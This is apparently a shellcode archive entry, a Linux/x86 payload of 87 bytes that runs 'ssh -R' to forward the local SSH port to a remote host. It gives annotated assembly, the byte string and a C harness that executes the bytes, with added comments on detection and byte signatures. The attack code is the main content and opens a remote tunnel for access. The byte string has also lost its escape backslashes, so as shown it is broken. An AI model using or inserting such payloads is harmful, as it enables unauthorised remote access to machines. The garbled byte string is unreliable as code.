
# Title : Linux/x86 Remote Port Forwarding Shellcode 87 bytes
# Published : 2012-12-24
# Author :


*****************************************************
* Linux/x86 Remote Port forwarding 87 bytes         *
* ssh -R 9999:localhost:22 192.168.0.226            *
*****************************************************
* Author: Hamza Megahed                             *
*****************************************************
* Twitter: @Hamza_Mega                              *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com             *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        *
*****************************************************

# Linux/x86 (32-bit), AT&T syntax.
# Builds four NUL-terminated strings and an argv[] array on the stack, then
# issues syscall 11 (execve) through int $0x80 with ebx = path, ecx = argv:
#   argv = { "/usr/bin/ssh", "-R", "09999:localhost:22", "192.168.00.226", NULL }
# Strings are pushed last chunk first, and each immediate is stored
# little-endian, so $0x3632322e lands in memory as the text ".226".
# The literal strings differ from the banner (9999 / 192.168.0.226) by one
# extra '0' each; presumably padding so every string splits into whole
# 4-byte and 2-byte pushes -- confirm.
# Register roles: esi = host string, ebp = forward spec, edi = "-R",
#                 ebx = program path, ecx = argv array.
# Detection note: the observable effect is the current process image being
# replaced by /usr/bin/ssh carrying a -R argument, so process-exec telemetry
# that records argv captures it.

xor    %eax,%eax          # eax = 0; reused below as NUL terminator and NULL pointer
push   %eax               # four zero bytes: terminator for the host string
pushl  $0x3632322e        # ".226"
pushl  $0x30302e38        # "8.00"
pushl  $0x36312e32        # "2.16"
pushw  $0x3931            # "19"  -> stack now holds "192.168.00.226"
movl   %esp,%esi          # esi -> "192.168.00.226"
push   %eax               # terminator for the forward spec
push   $0x32323a74        # "t:22"
push   $0x736f686c        # "lhos"
push   $0x61636f6c        # "loca"
push   $0x3a393939        # "999:"
pushw  $0x3930            # "09"  -> stack now holds "09999:localhost:22"
movl   %esp,%ebp          # ebp -> "09999:localhost:22"
push   %eax               # terminator for the option string
pushw  $0x522d            # "-R"
movl   %esp,%edi          # edi -> "-R"
push   %eax               # terminator for the program path
push   $0x6873732f        # "/ssh"
push   $0x6e69622f        # "/bin"
push   $0x7273752f        # "/usr"
movl   %esp,%ebx          # ebx -> "/usr/bin/ssh" (execve path argument)
push   %eax               # argv[4] = NULL
push   %esi               # argv[3] = host string
push   %ebp               # argv[2] = forward spec
push   %edi               # argv[1] = "-R"
push   %ebx               # argv[0] = program path
movl   %esp,%ecx          # ecx -> argv array
mov    $0xb,%al           # eax is still 0 from the xor, so eax = 11 (execve)
int    $0x80              # enter the kernel through the 32-bit syscall gate

********************************
#include <stdio.h>
#include <string.h>
 
/*
 * Assembled form of the listing above: 87 byte values, matching the
 * "87 bytes" in the title.
 * NOTE(review): each xNN group looks like a \xNN hex escape whose backslash
 * was lost when this page was copied; as rendered here the literal is plain
 * ASCII text, not the machine code.
 * Recognisable encodings: 31 c0 = xor %eax,%eax; 50 = push %eax;
 * 68 = push imm32; 66 68 = pushw imm16; b0 0b = mov $0xb,%al;
 * cd 80 = int $0x80.
 * The imm32 operands spell "/usr", "/bin", "/ssh" and the imm16 "-R" in
 * ASCII, which makes them usable anchors for a byte-pattern signature.
 * None of the 87 values is 00, so strlen() over the decoded bytes reports
 * the full length.
 */
char *shellcode = 
"x31xc0x50x68x2ex32x32x36x68x38x2ex30x30x68x32x2ex31x36"
"x66x68x31x39x89xe6x50x68x74x3ax32x32x68x6cx68x6fx73x68"
"x6cx6fx63x61x68x39x39x39x3ax66x68x30x39x89xe5x50x66x68"
"x2dx52x89xe7x50x68x2fx73x73x68x68x2fx62x69x6ex68x2fx75"
"x73x72x89xe3x50x56x55x57x53x89xe1xb0x0bxcdx80";



 
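/*
 * Test harness: prints the length of the byte string, then calls the bytes
 * as if they were a function.
 *
 * Returns 0 only if control comes back from the call; when the payload's
 * execve succeeds the process image is replaced and this function never
 * returns.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching conversion is %zu, not %d.
     * The count stops at the first zero byte in the string. */
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));

    /* Cast the data pointer to a function pointer and call through it.
     * String literals are normally placed in read-only data, which current
     * toolchains and kernels typically map non-executable, so on such
     * systems this call faults instead of running the bytes. */
    (*(void(*)()) shellcode)();
    return 0;
}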